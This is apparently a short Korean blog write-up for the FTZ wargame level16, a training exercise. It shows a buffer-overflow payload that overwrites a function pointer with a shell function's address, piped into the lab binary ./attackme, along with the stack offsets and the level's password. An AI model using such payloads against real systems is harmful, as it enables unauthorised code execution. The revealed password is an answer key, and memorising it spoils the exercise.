FTZ level16 본문
포인터 함수 안에 들어간 printit 주소 값을 shell주소로 바꿔버리도록 하자
buf : [ebp-56]
*call : [ebp-16]
payload
(python –c ‘print “\x90”*40 + “\xd0\x84\x04\x08”’; cat) | ./attackme
password : king poetic
'wargame > FTZ-LEVEL' 카테고리의 다른 글
| FTZ level18 (0) | 2021.10.08 |
|---|---|
| FTZ level17 (0) | 2021.10.08 |
| FTZ level15 (0) | 2021.10.07 |
| FTZ level14 (0) | 2021.10.07 |
| FTZ level13 (0) | 2021.10.07 |
'wargame/FTZ-LEVEL' 관련글
더보기
Comments